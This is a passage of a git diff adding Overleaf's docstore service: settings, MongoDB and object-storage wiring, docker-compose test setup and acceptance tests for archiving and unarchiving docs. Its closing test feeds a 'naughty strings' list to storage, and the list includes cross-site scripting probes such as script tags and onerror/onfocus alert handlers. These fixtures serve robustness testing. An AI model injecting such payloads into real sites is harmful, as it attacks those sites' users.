markDocAsArchived, + checkRevUnchanged, + destroyProject, + }, +} diff --git a/services/docstore/app/js/PersistorManager.js b/services/docstore/app/js/PersistorManager.js new file mode 100644 index 0000000..5838271 --- /dev/null +++ 
b/services/docstore/app/js/PersistorManager.js @@ -0,0 +1,12 @@ +const settings = require('@overleaf/settings') + +const persistorSettings = settings.docstore +persistorSettings.Metrics = require('@overleaf/metrics') + +const ObjectPersistor = require('@overleaf/object-persistor') +const AbstractPersistor = require('@overleaf/object-persistor/src/AbstractPersistor') +const persistor = settings.docstore.backend + ? ObjectPersistor(persistorSettings) + : new AbstractPersistor() + +module.exports = persistor diff --git a/services/docstore/app/js/RangeManager.js b/services/docstore/app/js/RangeManager.js new file mode 100644 index 0000000..f36f68f --- /dev/null +++ b/services/docstore/app/js/RangeManager.js @@ -0,0 +1,68 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let RangeManager +const _ = require('lodash') +const { ObjectId } = require('./mongodb') + +module.exports = RangeManager = { + shouldUpdateRanges(docRanges, incomingRanges) { + if (incomingRanges == null) { + throw new Error('expected incoming_ranges') + } + + // If the ranges are empty, we don't store them in the DB, so set + // doc_ranges to an empty object as default, since this is was the + // incoming_ranges will be for an empty range set. + if (docRanges == null) { + docRanges = {} + } + + return !_.isEqual(docRanges, incomingRanges) + }, + + jsonRangesToMongo(ranges) { + if (ranges == null) { + return null + } + + const updateMetadata = function (metadata) { + if ((metadata != null ? metadata.ts : undefined) != null) { + metadata.ts = new Date(metadata.ts) + } + if ((metadata != null ? metadata.user_id : undefined) != null) { + return (metadata.user_id = RangeManager._safeObjectId(metadata.user_id)) + } + } + + for (const change of Array.from(ranges.changes || [])) { + change.id = RangeManager._safeObjectId(change.id) + updateMetadata(change.metadata) + } + for (const comment of Array.from(ranges.comments || [])) { + comment.id = RangeManager._safeObjectId(comment.id) + if ((comment.op != null ? 
comment.op.t : undefined) != null) { + comment.op.t = RangeManager._safeObjectId(comment.op.t) + } + updateMetadata(comment.metadata) + } + return ranges + }, + + _safeObjectId(data) { + try { + return new ObjectId(data) + } catch (error) { + return data + } + }, +} diff --git a/services/docstore/app/js/StreamToBuffer.js b/services/docstore/app/js/StreamToBuffer.js new file mode 100644 index 0000000..7de146c --- /dev/null +++ b/services/docstore/app/js/StreamToBuffer.js @@ -0,0 +1,28 @@ +const { LoggerStream, WritableBuffer } = require('@overleaf/stream-utils') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger/logging-manager') +const { pipeline } = require('node:stream/promises') +const { callbackify } = require('node:util') + +module.exports = { + streamToBuffer: callbackify(streamToBuffer), + promises: { + streamToBuffer, + }, +} + +async function streamToBuffer(projectId, docId, stream) { + const loggerTransform = new LoggerStream( + Settings.max_doc_length, + (size, isFlush) => { + logger.warn( + { projectId, docId, size, finishedReading: isFlush }, + 'potentially large doc pulled down from gcs' + ) + } + ) + + const buffer = new WritableBuffer() + await pipeline(stream, loggerTransform, buffer) + return buffer.contents() +} diff --git a/services/docstore/app/js/mongodb.js b/services/docstore/app/js/mongodb.js new file mode 100644 index 0000000..796cd6c --- /dev/null +++ b/services/docstore/app/js/mongodb.js @@ -0,0 +1,18 @@ +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { MongoClient, ObjectId } = require('mongodb-legacy') + +const mongoClient = new MongoClient(Settings.mongo.url, Settings.mongo.options) +const mongoDb = mongoClient.db() + +const db = { + docs: mongoDb.collection('docs'), +} + +Metrics.mongodb.monitor(mongoClient) + +module.exports = { + db, + mongoClient, + ObjectId, +} diff --git a/services/docstore/buildscript.txt b/services/docstore/buildscript.txt new file mode 100644 index 0000000..c329d7b --- /dev/null +++ b/services/docstore/buildscript.txt @@ -0,0 +1,9 @@ +docstore +--dependencies=mongo,gcs +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=True +--script-version=4.7.0 diff --git a/services/docstore/config/settings.defaults.js b/services/docstore/config/settings.defaults.js new file mode 100644 index 0000000..9ad506a --- /dev/null +++ b/services/docstore/config/settings.defaults.js @@ -0,0 +1,92 @@ +const http = require('node:http') +const https = require('node:https') + +http.globalAgent.maxSockets = 300 +http.globalAgent.keepAlive = false +https.globalAgent.keepAlive = false + +const Settings = { + internal: { + docstore: { + port: 3016, + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + + mongo: { + options: { + monitorCommands: true, + }, + }, + + docstore: { + archiveOnSoftDelete: process.env.ARCHIVE_ON_SOFT_DELETE === 'true', + keepSoftDeletedDocsArchived: + process.env.KEEP_SOFT_DELETED_DOCS_ARCHIVED === 'true', + + backend: process.env.BACKEND, + healthCheck: { + project_id: process.env.HEALTH_CHECK_PROJECT_ID, + }, + bucket: process.env.BUCKET_NAME || process.env.AWS_BUCKET || 'bucket', + gcs: { + unlockBeforeDelete: process.env.GCS_UNLOCK_BEFORE_DELETE === 'true', + deletedBucketSuffix: process.env.GCS_DELETED_BUCKET_SUFFIX, + deleteConcurrency: parseInt(process.env.GCS_DELETE_CONCURRENCY) || 50, + }, + }, + + max_deleted_docs: 
parseInt(process.env.MAX_DELETED_DOCS, 10) || 2000, + + max_doc_length: parseInt(process.env.MAX_DOC_LENGTH) || 2 * 1024 * 1024, // 2mb + + maxJsonRequestSize: + parseInt(process.env.MAX_JSON_REQUEST_SIZE) || 6 * 1024 * 1024, // 6 MB + + unArchiveBatchSize: parseInt(process.env.UN_ARCHIVE_BATCH_SIZE, 10) || 50, + parallelArchiveJobs: parseInt(process.env.PARALLEL_ARCHIVE_JOBS, 10) || 5, + archivingLockDurationMs: + parseInt(process.env.ARCHIVING_LOCK_DURATION_MS, 10) || 60000, +} + +if (process.env.MONGO_CONNECTION_STRING) { + Settings.mongo.url = process.env.MONGO_CONNECTION_STRING +} else if (process.env.MONGO_HOST) { + Settings.mongo.url = `mongodb://${process.env.MONGO_HOST}/sharelatex` +} else { + Settings.mongo.url = 'mongodb://127.0.0.1/sharelatex' +} + +if ( + process.env.AWS_ACCESS_KEY_ID && + process.env.AWS_SECRET_ACCESS_KEY && + process.env.AWS_BUCKET +) { + Settings.docstore.s3 = { + key: process.env.AWS_ACCESS_KEY_ID, + secret: process.env.AWS_SECRET_ACCESS_KEY, + bucket: process.env.AWS_BUCKET, + endpoint: process.env.AWS_S3_ENDPOINT, + pathStyle: process.env.AWS_S3_PATH_STYLE, + partSize: parseInt(process.env.AWS_S3_PARTSIZE) || 100 * 1024 * 1024, + } +} + +if (process.env.GCS_API_ENDPOINT) { + Settings.docstore.gcs.endpoint = { + apiEndpoint: process.env.GCS_API_ENDPOINT, + projectId: process.env.GCS_PROJECT_ID, + } +} + +if (process.env.FALLBACK_BACKEND) { + Settings.docstore.fallback = { + backend: process.env.FALLBACK_BACKEND, + // mapping of bucket names on the fallback, to bucket names on the primary. + // e.g. { myS3UserFilesBucketName: 'myGoogleUserFilesBucketName' } + buckets: JSON.parse(process.env.FALLBACK_BUCKET_MAPPING || '{}'), + copyOnMiss: process.env.COPY_ON_MISS === 'true', + } +} + +module.exports = Settings diff --git a/services/docstore/docker-compose.ci.yml b/services/docstore/docker-compose.ci.yml new file mode 100644 index 0000000..a1a9995 --- /dev/null +++ b/services/docstore/docker-compose.ci.yml @@ -0,0 +1,64 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + GCS_API_ENDPOINT: http://gcs:9090 + GCS_PROJECT_ID: fake + STORAGE_EMULATOR_HOST: http://gcs:9090/storage/v1 + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + mongo: + condition: service_started + gcs: + condition: service_healthy + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. 
+ - mongo:127.0.0.1 + gcs: + image: fsouza/fake-gcs-server:1.45.2 + command: ["--port=9090", "--scheme=http"] + healthcheck: + test: wget --quiet --output-document=/dev/null http://localhost:9090/storage/v1/b + interval: 1s + retries: 20 diff --git a/services/docstore/docker-compose.yml b/services/docstore/docker-compose.yml new file mode 100644 index 0000000..93a029b --- /dev/null +++ b/services/docstore/docker-compose.yml @@ -0,0 +1,68 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/docstore + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/docstore + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/docstore + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/docstore + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + GCS_API_ENDPOINT: http://gcs:9090 + GCS_PROJECT_ID: fake + STORAGE_EMULATOR_HOST: http://gcs:9090/storage/v1 + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + gcs: + condition: service_healthy + command: npm run --silent test:acceptance + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. 
+ - mongo:127.0.0.1 + + gcs: + image: fsouza/fake-gcs-server:1.45.2 + command: ["--port=9090", "--scheme=http"] + healthcheck: + test: wget --quiet --output-document=/dev/null http://localhost:9090/storage/v1/b + interval: 1s + retries: 20 diff --git a/services/docstore/package.json b/services/docstore/package.json new file mode 100644 index 0000000..e505f73 --- /dev/null +++ b/services/docstore/package.json @@ -0,0 +1,47 @@ +{ + "name": "@overleaf/docstore", + "description": "A CRUD API for handling text documents in projects", + "private": true, + "main": "app.js", + "scripts": { + "start": "node app.js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "celebrate": "^15.0.3", + "express": "^4.21.2", + "lodash": "^4.17.21", + "mongodb-legacy": "6.1.3", + "p-map": "^4.0.0", + "request": "^2.88.2" + }, + "devDependencies": { + "@google-cloud/storage": "^6.10.1", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "~2.0.4", + "sinon": "~9.0.2", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } +} diff --git a/services/docstore/test/acceptance/deps/Dockerfile.fake-gcs b/services/docstore/test/acceptance/deps/Dockerfile.fake-gcs new file mode 100644 index 0000000..0e6de7e --- /dev/null +++ b/services/docstore/test/acceptance/deps/Dockerfile.fake-gcs @@ -0,0 +1,5 @@ +FROM fsouza/fake-gcs-server:latest +RUN apk add --update --no-cache curl +COPY healthcheck.sh /healthcheck.sh +HEALTHCHECK --interval=1s --timeout=1s --retries=30 CMD /healthcheck.sh http://localhost:9090 +CMD ["--port=9090", "--scheme=http"] diff --git a/services/docstore/test/acceptance/deps/healthcheck.sh b/services/docstore/test/acceptance/deps/healthcheck.sh new file mode 100644 index 0000000..675c205 --- /dev/null +++ b/services/docstore/test/acceptance/deps/healthcheck.sh @@ -0,0 +1,9 @@ +#!/bin/sh + +# health check to allow 404 status code as valid +STATUSCODE=$(curl --silent --output /dev/null --write-out "%{http_code}" "$1") +# will be 000 on non-http error (e.g. connection failure) +if test "$STATUSCODE" -ge 500 || test "$STATUSCODE" -lt 200; then + exit 1 +fi +exit 0 diff --git a/services/docstore/test/acceptance/js/ArchiveDocsTests.js b/services/docstore/test/acceptance/js/ArchiveDocsTests.js new file mode 100644 index 0000000..d922810 --- /dev/null +++ b/services/docstore/test/acceptance/js/ArchiveDocsTests.js @@ -0,0 +1,1239 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
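+// These tests exercise archiving end-to-end against the fake-gcs-server
+// from docker-compose: docs are created over HTTP, archived, checked in
+// Mongo and in the bucket via getS3Doc, then unarchived again.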
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ + +const Settings = require('@overleaf/settings') +const { expect } = require('chai') +const { db, ObjectId } = require('../../../app/js/mongodb') +const async = require('async') +const DocstoreApp = require('./helpers/DocstoreApp') +const DocstoreClient = require('./helpers/DocstoreClient') +const { Storage } = require('@google-cloud/storage') +const Persistor = require('../../../app/js/PersistorManager') +const { ReadableString } = require('@overleaf/stream-utils') + +function uploadContent(path, json, callback) { + const stream = new ReadableString(JSON.stringify(json)) + Persistor.sendStream(Settings.docstore.bucket, path, stream) + .then(() => callback()) + .catch(callback) +} + +describe('Archiving', function () { + before(function (done) { + return DocstoreApp.ensureRunning(done) + }) + + before(async function () { + const storage = new Storage(Settings.docstore.gcs.endpoint) + await storage.createBucket(Settings.docstore.bucket) + await storage.createBucket(`${Settings.docstore.bucket}-deleted`) + }) + + after(async function () { + // Tear down the buckets created above + const storage = new Storage(Settings.docstore.gcs.endpoint) + await storage.bucket(Settings.docstore.bucket).deleteFiles() + await storage.bucket(Settings.docstore.bucket).delete() + await storage.bucket(`${Settings.docstore.bucket}-deleted`).deleteFiles() + await storage.bucket(`${Settings.docstore.bucket}-deleted`).delete() + }) + + describe('multiple docs in a project', function () { + before(function (done) { + this.project_id = new ObjectId() + this.docs = [ + { + _id: new ObjectId(), + lines: ['one', 'two', 'three'], + ranges: {}, + version: 2, + }, + { + _id: new ObjectId(), + lines: ['aaa', 'bbb', 'ccc'], + ranges: {}, + version: 4, + }, + ] + const jobs = Array.from(this.docs).map(doc => + (doc => { + return callback => { + return DocstoreClient.createDoc( + this.project_id, + doc._id, + doc.lines, + doc.version, + doc.ranges, + callback + ) + } + })(doc) + ) + + return async.series(jobs, error => { + if (error != null) { + throw error + } + return DocstoreClient.archiveAllDoc(this.project_id, (error, res) => { + if (error) return done(error) + this.res = res + return done() + }) + }) + }) + + it('should archive all the docs', function (done) { + this.res.statusCode.should.equal(204) + return done() + }) + + it('should set inS3 and unset lines and ranges in each doc', function (done) { + const jobs = Array.from(this.docs).map(doc => + (doc => { + return callback => { + return db.docs.findOne({ _id: doc._id }, (error, doc) => { + if (error) return callback(error) + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + return callback() + }) + } + })(doc) + ) + return async.series(jobs, done) + }) + + it('should set the docs in s3 correctly', function (done) { + const jobs = Array.from(this.docs).map(doc => + (doc => { + return callback => { + return DocstoreClient.getS3Doc( + this.project_id, + doc._id, + (error, s3Doc) => { + if (error) return callback(error) + s3Doc.lines.should.deep.equal(doc.lines) + s3Doc.ranges.should.deep.equal(doc.ranges) + callback() + } + ) + } + })(doc) + ) + return async.series(jobs, done) + }) + + return describe('after unarchiving from 
a request for the project', function () { + before(function (done) { + return DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + }) + + it('should return the docs', function (done) { + for (let i = 0; i < this.fetched_docs.length; i++) { + const doc = this.fetched_docs[i] + doc.lines.should.deep.equal(this.docs[i].lines) + } + return done() + }) + + return it('should restore the docs to mongo', function (done) { + const jobs = Array.from(this.docs).map((doc, i) => + ((doc, i) => { + return callback => { + return db.docs.findOne({ _id: doc._id }, (error, doc) => { + if (error) return callback(error) + doc.lines.should.deep.equal(this.docs[i].lines) + doc.ranges.should.deep.equal(this.docs[i].ranges) + expect(doc.inS3).not.to.exist + return callback() + }) + } + })(doc, i) + ) + return async.series(jobs, done) + }) + }) + }) + + describe('a deleted doc', function () { + beforeEach(function (done) { + this.project_id = new ObjectId() + this.doc = { + _id: new ObjectId(), + lines: ['one', 'two', 'three'], + ranges: {}, + version: 2, + } + return DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error != null) { + throw error + } + return DocstoreClient.deleteDoc( + this.project_id, + this.doc._id, + error => { + if (error != null) { + throw error + } + return DocstoreClient.archiveAllDoc( + this.project_id, + (error, res) => { + this.res = res + if (error != null) { + throw error + } + return done() + } + ) + } + ) + } + ) + }) + + it('should successully archive the docs', function (done) { + this.res.statusCode.should.equal(204) + return done() + }) + + it('should set inS3 and unset lines and ranges in each doc', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + doc.deleted.should.equal(true) + return done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + return DocstoreClient.getS3Doc( + this.project_id, + this.doc._id, + (error, s3Doc) => { + if (error != null) { + throw error + } + s3Doc.lines.should.deep.equal(this.doc.lines) + s3Doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + + describe('after unarchiving from a request for the project', function () { + beforeEach(function (done) { + return DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + }) + + it('should not included the deleted', function (done) { + this.fetched_docs.length.should.equal(0) + return done() + }) + + return it('should restore the doc to mongo', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + doc.lines.should.deep.equal(this.doc.lines) + doc.ranges.should.deep.equal(this.doc.ranges) + expect(doc.inS3).not.to.exist + doc.deleted.should.equal(true) + return done() + }) + }) + }) + + describe('when keepSoftDeletedDocsArchived is enabled', function () { + let keepSoftDeletedDocsArchived + beforeEach(function overwriteSetting() { + keepSoftDeletedDocsArchived = + Settings.docstore.keepSoftDeletedDocsArchived + Settings.docstore.keepSoftDeletedDocsArchived = true + }) + 
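+      // The setting is toggled per test; the afterEach below restores the
+      // value saved in the beforeEach above.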
afterEach(function restoreSetting() { + Settings.docstore.keepSoftDeletedDocsArchived = + keepSoftDeletedDocsArchived + }) + + describe('after unarchiving from a request for the project', function () { + beforeEach(function (done) { + DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error) { + return done(error) + } + done() + } + ) + }) + + it('should not included the deleted', function (done) { + this.fetched_docs.length.should.equal(0) + done() + }) + + it('should not have restored the deleted doc to mongo', function (done) { + db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error) { + return done(error) + } + expect(doc.lines).to.not.exist + expect(doc.ranges).to.not.exist + expect(doc.inS3).to.equal(true) + expect(doc.deleted).to.equal(true) + done() + }) + }) + }) + }) + }) + + describe('archiving a single doc', function () { + before(function (done) { + this.project_id = new ObjectId() + this.timeout(1000 * 30) + this.doc = { + _id: new ObjectId(), + lines: ['foo', 'bar'], + ranges: {}, + version: 2, + } + DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error) { + return done(error) + } + DocstoreClient.archiveDoc( + this.project_id, + this.doc._id, + (error, res) => { + this.res = res + if (error) { + return done(error) + } + done() + } + ) + } + ) + }) + + it('should successully archive the doc', function (done) { + this.res.statusCode.should.equal(204) + done() + }) + + it('should set inS3 and unset lines and ranges in the doc', function (done) { + db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error) { + return done(error) + } + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + DocstoreClient.getS3Doc(this.project_id, this.doc._id, (error, s3Doc) => { + if (error) { + return done(error) + } + s3Doc.lines.should.deep.equal(this.doc.lines) + s3Doc.ranges.should.deep.equal(this.doc.ranges) + done() + }) + }) + }) + + describe('a doc with large lines', function () { + before(function (done) { + this.project_id = new ObjectId() + this.timeout(1000 * 30) + const quarterMegInBytes = 250000 + const bigLine = require('node:crypto') + .randomBytes(quarterMegInBytes) + .toString('hex') + this.doc = { + _id: new ObjectId(), + lines: [bigLine, bigLine, bigLine, bigLine], + ranges: {}, + version: 2, + } + return DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error != null) { + throw error + } + return DocstoreClient.archiveAllDoc(this.project_id, (error, res) => { + this.res = res + if (error != null) { + throw error + } + return done() + }) + } + ) + }) + + it('should successully archive the docs', function (done) { + this.res.statusCode.should.equal(204) + return done() + }) + + it('should set inS3 and unset lines and ranges in each doc', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + return done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + return DocstoreClient.getS3Doc( + this.project_id, + this.doc._id, + (error, s3Doc) => { + if (error != null) { + throw error + } + 
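+          // the archived JSON must round-trip the exact lines and ranges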
s3Doc.lines.should.deep.equal(this.doc.lines) + s3Doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + + return describe('after unarchiving from a request for the project', function () { + before(function (done) { + return DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + }) + + return it('should restore the doc to mongo', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + doc.lines.should.deep.equal(this.doc.lines) + doc.ranges.should.deep.equal(this.doc.ranges) + expect(doc.inS3).not.to.exist + return done() + }) + }) + }) + }) + + describe('a doc with naughty strings', function () { + before(function (done) { + this.project_id = new ObjectId() + this.doc = { + _id: new ObjectId(), + lines: [ + '', + 'undefined', + 'undef', + 'null', + 'NULL', + '(null)', + 'nil', + 'NIL', + 'true', + 'false', + 'True', + 'False', + 'None', + '\\', + '\\\\', + '0', + '1', + '1.00', + '$1.00', + '1/2', + '1E2', + '1E02', + '1E+02', + '-1', + '-1.00', + '-$1.00', + '-1/2', + '-1E2', + '-1E02', + '-1E+02', + '1/0', + '0/0', + '-2147483648/-1', + '-9223372036854775808/-1', + '0.00', + '0..0', + '.', + '0.0.0', + '0,00', + '0,,0', + ',', + '0,0,0', + '0.0/0', + '1.0/0.0', + '0.0/0.0', + '1,0/0,0', + '0,0/0,0', + '--1', + '-', + '-.', + '-,', + '999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999', + 'NaN', + 'Infinity', + '-Infinity', + '0x0', + '0xffffffff', + '0xffffffffffffffff', + '0xabad1dea', + '123456789012345678901234567890123456789', + '1,000.00', + '1 000.00', + "1'000.00", + '1,000,000.00', + '1 000 000.00', + "1'000'000.00", + '1.000,00', + '1 000,00', + "1'000,00", + '1.000.000,00', + '1 000i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟', + '̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕', + 'Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮', + "˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥", + '00˙Ɩ$-', + 'The quick brown fox jumps over the lazy dog', + '𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠', + '𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌', + '𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈', + '𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰', + '𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘', + '𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐', + '⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢', + '<script>alert(123)</script>', + '<script>alert('123');</script>', + '<img src=x onerror=alert(123) />', + '<svg><script>123<1>alert(123)</script> ', + '"><script>alert(123)</script>', + "'><script>alert(123)</script>", + '><script>alert(123)</script>', + '</script><script>alert(123)</script>', + '< / script >< script >alert(123)< / script >', + ' onfocus=JaVaSCript:alert(123) autofocus ', + '" onfocus=JaVaSCript:alert(123) autofocus ', + "' onfocus=JaVaSCript:alert(123) autofocus ", + '<script>alert(123)</script>', + '<sc<script>ript>alert(123)</sc</script>ript>', + '--><script>alert(123)</script>', + '";alert(123);t="', + "';alert(123);t='", + 'JavaSCript:alert(123)', + ';alert(123);', + 'src=JaVaSCript:prompt(132)', + 